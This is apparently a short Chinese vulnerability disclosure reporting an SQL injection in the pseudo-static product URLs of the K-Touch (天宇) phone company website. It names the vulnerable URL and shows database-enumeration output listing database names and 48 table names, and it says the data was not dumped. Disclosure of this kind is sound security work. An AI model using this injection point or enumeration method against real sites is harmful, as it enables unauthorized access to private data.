天宇手机官网伪静态SQL注入漏洞 - 网站安全 - 自

天宇手机官网伪静态SQL注入 漏洞

测试URL http://www.k-touch.cn/product/condetail/prod_id/123. html  

web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0 back-end DBMS: MySQL 5.0 available databases [5]: [*] donglonghai [*] information_schema [*] mysql [*] qiangguo [*] renshe current database: 'renshe' Database: renshe [48 tables] +-------------------+ | yan_access | | yan_ad | | yan_admin | | yan_announce | | yan_answer | | yan_baoming | | yan_bjcx | | yan_bs | | yan_bscategory | | yan_bszn | | yan_bszncategory | | yan_case | | yan_casecategory | | yan_category | | yan_city | | yan_cx | | yan_cxcategory | | yan_downcategory | | yan_download | | yan_gk | | yan_gkcategory | | yan_goodscategory | | yan_guanggao | | yan_hdjl | | yan_jgxx | | yan_jianli | | yan_link | | yan_member | | yan_msg | | yan_news | | yan_node | | yan_one | | yan_onecategory | | yan_page | | yan_province | | yan_role | | yan_role_user | | yan_sound | | yan_special | | yan_ticket | | yan_toupiao | | yan_type | | yan_user | | yan_xwzx | | yan_xwzxcategory | | yan_zcfg | | yan_zxtype | | yan_zxzx | +-------------------+

很多敏感表，昨天测试了，未脱裤。

修复方案：

过滤吧。

查看更多关于天宇手机官网伪静态SQL注入漏洞 - 网站安全 - 自的详细内容...